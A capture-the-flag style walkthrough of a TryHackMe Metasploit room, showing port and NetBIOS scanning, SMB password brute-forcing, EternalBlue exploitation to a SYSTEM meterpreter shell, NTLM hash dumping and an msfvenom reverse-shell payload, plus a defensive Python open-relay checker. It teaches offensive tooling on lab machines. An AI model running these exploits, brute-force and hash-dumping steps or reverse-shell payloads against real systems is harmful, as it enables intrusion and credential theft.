THM Room https://tryhackme.com/room/metasploitexploitation
TASK 1 : Introduction
Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.
No Answer
TASK 2 : Scanning
How many ports are open on the target system?
root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole
[...]
msf5 > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner
msf5 > use 5
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 10.10.33.77: - 10.10.33.77:21 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:22 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:139 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:445 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:8000 - TCP OPEN
[*] 10.10.33.77: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We found 5 open TCP ports. Answer : 5
Using the relevant scanner, what NetBIOS name can you see?
msf5 auxiliary(scanner/portscan/tcp) > back
msf5 > search netbios
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/netbios/netbios_spoof normal No NetBIOS Response Brute Force Spoof (Direct)
1 auxiliary/dos/smb/smb_loris 2017-06-29 normal No SMBLoris NBSS Denial of Service
2 auxiliary/scanner/http/ntlm_info_enumeration normal No Host Information Enumeration via NTLM Authentication
3 auxiliary/scanner/netbios/nbname normal No NetBIOS Information Discovery
4 auxiliary/server/netbios_spoof_nat 2016-06-14 normal No NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)
5 auxiliary/server/wpad normal No WPAD.dat File Server
6 auxiliary/spoof/llmnr/llmnr_response normal No LLMNR Spoofer
7 auxiliary/spoof/nbns/nbns_response normal No NetBIOS Name Service Spoofer
Interact with a module by name or index, for example use 7 or use auxiliary/spoof/nbns/nbns_response
msf5 > use 3
msf5 auxiliary(scanner/netbios/nbname) > show options
Module options (auxiliary/scanner/netbios/nbname):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 137 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
msf5 auxiliary(scanner/netbios/nbname) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/netbios/nbname) > run
[*] Sending NetBIOS requests to 10.10.33.77->10.10.33.77 (1 hosts)
[+] 10.10.33.77 [IP-10-10-33-77] OS:Unix Names:(IP-10-10-33-77, __MSBROWSE__, ACME IT SUPPORT) Addresses:(10.10.33.77) Mac:00:00:00:00:00:00
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer : ACME IT SUPPORT
What is running on port 8000?
To answer this, I ran nmap to identify the service on port 8000, then used the auxiliary/scanner/http/http_version module:
msf5 auxiliary(scanner/netbios/nbname) > back
msf5 > nmap -sS 10.10.33.77
[*] exec: nmap -sS 10.10.33.77
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 08:39 BST
Nmap scan report for ip-10-10-33-77.eu-west-1.compute.internal (10.10.33.77)
Host is up (0.0014s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8000/tcp open http-alt
MAC Address: 02:E9:BA:38:47:59 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds
msf5 > search http_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/http_version normal No HTTP Version Detection
msf5 > use 0
msf5 auxiliary(scanner/http/http_version) > show options
Module options (auxiliary/scanner/http/http_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/http_version) > setg RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/http/http_version) > set RPORT 8000
RPORT => 8000
msf5 auxiliary(scanner/http/http_version) > run
[+] 10.10.33.77:8000 webfs/1.21 ( 403-Forbidden )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer : webfs/1.21
What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
msf5 auxiliary(scanner/http/http_version) > back
msf5 > search scanner/smb
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
1 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
2 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
3 auxiliary/scanner/smb/pipe_auditor normal No SMB Session Pipe Auditor
4 auxiliary/scanner/smb/pipe_dcerpc_auditor normal No SMB Session Pipe DCERPC Auditor
5 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
6 auxiliary/scanner/smb/smb1 normal No SMBv1 Protocol Detection
7 auxiliary/scanner/smb/smb2 normal No SMB 2.0 Protocol Detection
8 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration
9 auxiliary/scanner/smb/smb_enumshares normal No SMB Share Enumeration
10 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)
11 auxiliary/scanner/smb/smb_enumusers_domain normal No SMB Domain User Enumeration
12 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
13 auxiliary/scanner/smb/smb_lookupsid normal No SMB SID User Enumeration (LookupSid)
14 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
15 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
16 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index, for example use 16 or use auxiliary/scanner/smb/smb_version
msf5 > use 12
msf5 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.33.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser penny
SMBUser => penny
msf5 auxiliary(scanner/smb/smb_login) > ls
[*] exec: ls
MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > set DB_ALL_PASS true
DB_ALL_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE MetasploitWordlist.txt
PASS_FILE => MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.33.77:445 - 10.10.33.77:445 - Starting SMB login bruteforce
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:95',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:98',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:2003',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:2008',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:111111',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:123456',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:12345678',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:1qaz2wsx',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:abc',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:abc123',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:abcd123',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:account',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:admin',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:adminadmin',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:administator',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:admins',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:air',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:alpine',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2013',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2013',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2014',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2014',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2015',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2015',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2016',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2016',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2017',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2017',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:bankbank',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:baseball',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:basketball',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:bird',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:burp',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:change',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:changelater',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:changeme',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company!',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company1',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company1!',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company123',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex1',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex2',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex3',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complexpassword',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:database',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:default',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:dev',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:devdev',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:devdevdev',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:dirt',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:dragon',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:earth',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:fire',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:football',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:god',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:guessme',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:hugs',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:letmein',
[+] 10.10.33.77:445 - 10.10.33.77:445 - Success: '.\penny:leo1234'
[*] 10.10.33.77:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer : leo1234
TASK 3 : The Metasploit Database
No answers needed.
No Answer
TASK 4 : Vulnerability Scanning
Who wrote the module that allows us to check SMTP servers for open relay?
Again, search for keywords like SMTP, smtp_server and relay. The last one gives me what I want:
msf5 > search relay
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/mssql/mssql_ntlm_stealer normal No Microsoft SQL Server NTLM Stealer
1 auxiliary/admin/mssql/mssql_ntlm_stealer_sqli normal No Microsoft SQL Server SQLi NTLM Stealer
2 auxiliary/admin/oracle/ora_ntlm_stealer 2009-04-07 normal No Oracle SMB Relay Code Execution
3 auxiliary/gather/ibm_bigfix_sites_packages_enum 2019-03-18 normal No IBM BigFix Relay Server Sites and Package Enum
4 auxiliary/scanner/http/exchange_web_server_pushsubscription 2019-01-21 normal No Microsoft Exchange Privilege Escalation Exploit
5 auxiliary/scanner/sap/sap_smb_relay normal No SAP SMB Relay Abuse
6 auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence normal No SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
7 auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir normal No SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
8 auxiliary/scanner/smtp/smtp_relay normal No SMTP Open Relay Detection
9 auxiliary/server/http_ntlmrelay normal No HTTP Client MS Credential Relayer
10 auxiliary/server/socks4a normal No Socks4a Proxy Server
11 auxiliary/server/socks5 normal No Socks5 Proxy Server
12 exploit/multi/http/october_upload_bypass_exec 2017-04-25 excellent Yes October CMS Upload Protection Bypass Code Execution
13 exploit/multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE
14 exploit/windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free
15 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
16 post/multi/manage/screenshare normal No Multi Manage the screen of the target meterpreter session
Interact with a module by name or index, for example use 16 or use post/multi/manage/screenshare
msf5 > use 8
msf5 auxiliary(scanner/smtp/smtp_relay) > info
Name: SMTP Open Relay Detection
Module: auxiliary/scanner/smtp/smtp_relay
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Campbell Murray
xistence <xistence@0x90.nl>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXTENDED false yes Do all the 16 extended checks
MAILFROM sender@example.com yes FROM address of the e-mail
MAILTO target@example.com yes TO address of the e-mail
RHOSTS 10.10.33.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module tests if an SMTP server will accept (via a code 250) an
e-mail by using a variation of testing methods. Some of the extended
methods will try to abuse configuration or mailserver flaws.
References:
http://www.ietf.org/rfc/rfc2821.txt
https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse
Answer : Campbell Murray
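As an added example (not code from the room or from the smtp_relay module), here is a Python model of what the module's description above is testing: the server-side RCPT TO policy that keeps a mail server from being an open relay, plus a check that reads a client/server exchange and reports whether the server answered 250 to a recipient and sender that are both outside its own domains. The domain list, the addresses and the C:/S: transcript format are assumptions of this example; the two exchanges are constructed, not captures from the room's target.

```python
import re
from dataclasses import dataclass

# Domains this (hypothetical) server is authoritative for; anything else is a relay.
LOCAL_DOMAINS = {"example.com"}


def domain_of(address: str) -> str:
    """Lower-cased domain part of an address like <user@domain>; '' if malformed."""
    m = re.fullmatch(r"[^@\s<>]+@([^@\s<>]+)", address.strip().strip("<>"))
    return m.group(1).lower() if m else ""


def rcpt_decision(rcpt_to: str, authenticated: bool = False,
                  local_domains=LOCAL_DOMAINS) -> str:
    """Server-side reply to RCPT TO: deliver to local mailboxes for anyone,
    relay to other domains only for authenticated clients, refuse the rest."""
    if domain_of(rcpt_to) in local_domains or authenticated:
        return "250 2.1.5 Ok"
    return "554 5.7.1 Relay access denied"


@dataclass
class RelayAttempt:
    mail_from: str
    rcpt_to: str
    reply: str  # server reply line that followed the RCPT TO


def parse_transcript(transcript: str):
    """Pair each RCPT TO in a 'C: ...' / 'S: ...' transcript with the sender in
    force and the reply it received. The C:/S: layout is this example's own."""
    attempts, mail_from, pending = [], "", None
    for raw in transcript.strip().splitlines():
        side, _, text = raw.partition(": ")
        if side == "C":
            m = re.match(r"(MAIL FROM|RCPT TO):\s*<?([^>\s]*)>?", text, re.I)
            if m and m.group(1).upper() == "MAIL FROM":
                mail_from = m.group(2)
            elif m:
                pending = m.group(2)
        elif side == "S" and pending is not None:
            attempts.append(RelayAttempt(mail_from, pending, text))
            pending = None
    return attempts


def is_open_relay(transcript: str, local_domains=LOCAL_DOMAINS) -> bool:
    """True if the server accepted (2xx) a recipient outside its domains from a
    sender outside its domains, which is the condition an open-relay check reports."""
    for a in parse_transcript(transcript):
        external = (domain_of(a.mail_from) not in local_domains
                    and domain_of(a.rcpt_to) not in local_domains)
        if external and a.reply.startswith("2"):
            return True
    return False


# Constructed exchanges: a correctly configured server, and the same session
# with the relay refusal replaced by an acceptance.
HARDENED = """
S: 220 mail.example.com ESMTP
C: EHLO scanner.test
S: 250 mail.example.com
C: MAIL FROM:<sender@external.test>
S: 250 2.1.0 Ok
C: RCPT TO:<alice@example.com>
S: 250 2.1.5 Ok
C: RCPT TO:<victim@other.test>
S: 554 5.7.1 Relay access denied
C: QUIT
S: 221 Bye
"""

OPEN_RELAY = HARDENED.replace("554 5.7.1 Relay access denied", "250 2.1.5 Ok")

if __name__ == "__main__":
    for name, t in (("hardened", HARDENED), ("misconfigured", OPEN_RELAY)):
        print(f"{name}: open relay = {is_open_relay(t)}")
```

The local recipient being accepted in the hardened exchange is not a finding: delivery to your own domain is what the server is for. Only a 2xx reply to an external-to-external pair indicates relaying for arbitrary third parties.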
TASK 5 : Exploitation
Exploit one of the critical vulnerabilities on the target VM.
msf5 > setg RHOSTS 10.10.215.124
RHOSTS => 10.10.215.124
msf5 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use 2
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.196.135:4444
[*] 10.10.215.124:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.215.124:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.215.124:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.215.124:445 - Connecting to target for exploitation.
[+] 10.10.215.124:445 - Connection established for exploitation.
[+] 10.10.215.124:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.215.124:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.215.124:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.215.124:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.215.124:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.215.124:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.215.124:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.215.124:445 - Sending all but last fragment of exploit packet
[*] 10.10.215.124:445 - Starting non-paged pool grooming
[+] 10.10.215.124:445 - Sending SMBv2 buffers
[+] 10.10.215.124:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.215.124:445 - Sending final SMBv2 buffers.
[*] 10.10.215.124:445 - Sending last fragment of exploit packet!
[*] 10.10.215.124:445 - Receiving response from exploit packet
[+] 10.10.215.124:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.215.124:445 - Sending egg to corrupted connection.
[*] 10.10.215.124:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.215.124
[*] Meterpreter session 2 opened (10.10.196.135:4444 -> 10.10.215.124:49189) at 2021-09-26 09:39:36 +0100
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
No Answer
What is the content of the flag.txt file?
meterpreter > shell
C:\Windows\system32>cd /Users
cd /Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users
12/12/2018 10:13 PM <DIR> .
12/12/2018 10:13 PM <DIR> ..
12/12/2018 10:13 PM <DIR> Jon
04/12/2011 03:28 AM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 39,938,625,536 bytes free
C:\Users>cd Jon/Desktop
cd Jon
C:\Users\Jon\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Desktop
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 39,938,625,536 bytes free
C:\Users\Jon\Desktop>cd ..
cd ..
C:\Users\Jon>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon
12/12/2018 10:13 PM <DIR> .
12/12/2018 10:13 PM <DIR> ..
12/12/2018 10:13 PM <DIR> Contacts
12/12/2018 10:49 PM <DIR> Desktop
07/14/2021 09:39 PM <DIR> Documents
12/12/2018 10:13 PM <DIR> Downloads
12/12/2018 10:13 PM <DIR> Favorites
12/12/2018 10:13 PM <DIR> Links
12/12/2018 10:13 PM <DIR> Music
12/12/2018 10:13 PM <DIR> Pictures
12/12/2018 10:13 PM <DIR> Saved Games
12/12/2018 10:13 PM <DIR> Searches
12/12/2018 10:13 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 39,938,625,536 bytes free
C:\Users\Jon>cd Documents
cd Documents
C:\Users\Jon\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
07/14/2021 09:39 PM <DIR> .
07/14/2021 09:39 PM <DIR> ..
07/14/2021 09:39 PM 15 flag.txt
1 File(s) 15 bytes
2 Dir(s) 39,938,625,536 bytes free
C:\Users\Jon\Documents>type flag.txt
type flag.txt
THM-5455554845
You can also use the search command in meterpreter:
meterpreter > search -f "flag.txt"
Found 1 result...
c:\Users\Jon\Documents\flag.txt (15 bytes)
Answer : THM-5455554845
What is the NTLM hash of the password of the user “pirate”?
We need to dump a user's hash. To do this, I'll background my meterpreter session and search for a hashdump module in Metasploit:
C:\Windows\system32>exit
exit
meterpreter >
Background session 2? [y/N]
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.196.135:4444 -> 10.10.215.124:49189 (10.10.215.124)
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > search hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
1 auxiliary/scanner/mssql/mssql_hashdump normal No MSSQL Password Hashdump
2 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump
3 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
4 auxiliary/scanner/oracle/oracle_hashdump normal No Oracle Password Hashdump
5 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
6 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
7 post/aix/hashdump normal No AIX Gather Dump Password Hashes
8 post/android/gather/hashdump normal No Android Gather Dump Password Hashes for Android Systems
9 post/bsd/gather/hashdump normal No BSD Dump Password Hashes
10 post/linux/gather/hashdump normal No Linux Gather Dump Password Hashes for Linux Systems
11 post/osx/gather/hashdump normal No OS X Gather Mac OS X Password Hash Collector
12 post/solaris/gather/hashdump normal No Solaris Gather Dump Password Hashes for Solaris Systems
13 post/windows/gather/credentials/domain_hashdump normal No Windows Domain Controller Hashdump
14 post/windows/gather/credentials/mcafee_vse_hashdump normal No McAfee Virus Scan Enterprise Password Hashes Dump
15 post/windows/gather/credentials/mssql_local_hashdump normal No Windows Gather Local SQL Server Hash Dump
16 post/windows/gather/hashdump normal No Windows Gather Local User Account Password Hashes (Registry)
17 post/windows/gather/smart_hashdump normal No Windows Gather Local and Domain Controller Account Password Hashes
Interact with a module by name or index, for example use 17 or use post/windows/gather/smart_hashdump
msf5 > use 16
msf5 post(windows/gather/hashdump) > show options
Module options (post/windows/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/hashdump) > set SESSION 2
SESSION => 2
msf5 post(windows/gather/hashdump) > show options
Module options (post/windows/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on.
msf5 post(windows/gather/hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
[*] Post module execution completed
Answer : 8ce9a3ebd1647fcc5e04025019f4b875
TASK 6 : Msfvenom
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell; this will make things easier.
No Answer
Create a meterpreter payload in the .elf format.
root@ip-10-10-196-135:~/Desktop/msexploit# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.196.135 LPORT=7777 --platform linux -f elf -o shell.elf
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf
